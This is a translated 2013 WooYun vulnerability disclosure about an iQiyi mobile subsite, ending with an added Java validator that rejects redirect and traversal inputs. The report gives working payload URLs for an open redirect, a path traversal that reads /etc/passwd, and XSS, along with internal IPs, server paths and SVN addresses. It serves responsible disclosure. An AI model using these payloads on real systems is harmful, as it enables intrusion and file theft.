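Vulnerability summary
Bug ID: wooyun-2013-025442
Title: Baidu iQiyi subsite: XSS, URL redirect, arbitrary file read, arbitrary file download, sensitive information disclosure, various vulnerabilities
Vendor: Qiyi
Author: 单恋一支花
Submitted: 2013-06-08 13:29
Fixed: 2013-07-23 13:30
Published: 2013-07-23 13:30
Vulnerability type: Unauthorized access / privilege bypass
Severity: High
Self-assessed Rank: 10
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: None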
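Vulnerability details
Disclosure status:
2013-06-08: Details sent to the vendor, awaiting vendor handling
2013-06-10: Vendor confirmed; details disclosed to the vendor only
2013-06-20: Details disclosed to core white hats and experts in related fields
2013-06-30: Details disclosed to regular white hats
2013-07-10: Details disclosed to trainee white hats
2013-07-23: Details disclosed to the public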
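Brief description:
Baidu iQiyi subsite: XSS, URL redirect, arbitrary file read, arbitrary file download, sensitive information disclosure. I have already obtained etc/shadow, database information, root information and so on. It can be used for phishing, and with a little effort CSRF is possible. I @-mentioned iQiyi on Weibo and nobody responded, so I could only post it on WooYun. Asking for a gift; if there is no gift, sending a girl would do too!!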
Detailed description:
http://3g.iqiyi.com/wap/pro/forward.jsp?forward_url=http://www.baidu.com (redirect; with some effort, CSRF should be possible)
http://3g.iqiyi.com//wap/pro/forward.jsp?c=&dirid=index&forward_url=..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2fetc%2fpasswd&linkid=285 (reads etc/passwd)
http://10.10.131.126:8087/wap/cms/index.jsp (admin backend address obtained via svn)
<%@ page import= "java.lang.*" %>
<%
String xhost = "10.10.131.126";
String xport = "8087";
String xhost_port = xhost + ":" + xport;
String xrpath = "/data/webroot/wap/";
String xImg = "/wap/images/srcpic/";
String xRImg = "/wap/images/realpic/";
String xImgPath = xrpath + "images/srcpic/";
String xImgRPath = xrpath + "images/realpic/";
String xImgKeyword = xrpath + "cms/keyword.txt";
String xIcon = xrpath + "images/icon/";
String xRIcon = xrpath + "images/logo";
String xVideo = "/wap/video/";
String xVideoPath = xrpath + "video/";
%>
Site configuration information
https://scm.qiyi.domain:18080/svn/mobilerep/server/wapsupport/212_wap/clien (sensitive svn information)
http://3g.iqiyi.com//wap/cache_admin.jsp?a=3&k=sbhelen<ScRiPt >alert(1);</ScRiPt>&t=wap_busitbl
http://3g.iqiyi.com/wap/pro/fdetail.jsp?c=" onmouseover=alert(/sbhelen/) bad="&linkid=285&plt=1&sid=9lwmvnzB08495198 (IE will show a prompt; work it out yourself)
http://3g.iqiyi.com/wap/cms/vte/vte.inc (site path disclosure)
Proof of vulnerability:
etc/passwd
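Admin backend
Path
Database
I'd better not give out the root information; it's too sensitive
Fix:
Do proper filtering. I don't know how much iQiyi will tolerate, so I don't dare release too much information! Be sure to take security seriously, don't overlook the svn information, and get the details right!
Copyright notice: when reposting, please credit the source 单恋一支花@乌云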
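An added example, not part of the original report and not iQiyi's code: one way to apply the "proper filtering" fix to the forward_url parameter, rejecting both the external-redirect and the ../ traversal shapes listed in the report. The class name, the /wap allowed root and the 512-character limit are assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Optional;

// Hypothetical helper (added example): decides whether a forward_url value may be
// used as an in-app forward/redirect target. Assumes a Unix host.
public final class ForwardTargetValidator {
    // Assumption: every legitimate target lives under /wap on the same site.
    private static final Path ALLOWED_ROOT = Paths.get("/wap");

    // Returns the normalized in-app path (query string dropped), or empty to reject.
    // raw is the value from request.getParameter, i.e. already URL-decoded once.
    public static Optional<String> safeTarget(String raw) {
        if (raw == null || raw.isEmpty() || raw.length() > 512) return Optional.empty();
        // Reject backslashes, control characters and leftover percent-encoding:
        // a '%' that survives decoding means the client double-encoded something.
        for (char ch : raw.toCharArray()) {
            if (ch == '\\' || ch == '%' || ch < 0x20 || ch == 0x7f) return Optional.empty();
        }
        URI uri;
        try {
            uri = new URI(raw);
        } catch (URISyntaxException e) {
            return Optional.empty();
        }
        // Open-redirect guard: no scheme, no host, no scheme-relative "//host".
        if (uri.isAbsolute() || uri.getRawAuthority() != null || raw.startsWith("//")) return Optional.empty();
        String path = uri.getPath();
        if (path == null || !path.startsWith("/")) return Optional.empty();
        // Traversal guard: collapse "." and ".." first, then check containment.
        Path normalized = Paths.get(path).normalize();
        if (!normalized.startsWith(ALLOWED_ROOT)) return Optional.empty();
        return Optional.of(normalized.toString());
    }

    public static void main(String[] args) {
        // Constructed inputs modelled on the parameter shapes in the report.
        String[] samples = {
            "/wap/pro/fdetail.jsp", "http://www.baidu.com", "//www.baidu.com",
            "../../../../etc/passwd", "/wap/../../etc/passwd", "..%2f..%2fetc%2fpasswd",
        };
        for (String s : samples) {
            System.out.println(s + " -> " + safeTarget(s).orElse("REJECTED"));
        }
    }
}
```

The containment check compares whole path components, so a sibling directory such as /wapx does not pass as being under /wap.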
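Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-06-10 22:17
Vendor reply:
Thanks for the reminder, much appreciated
Latest status:
None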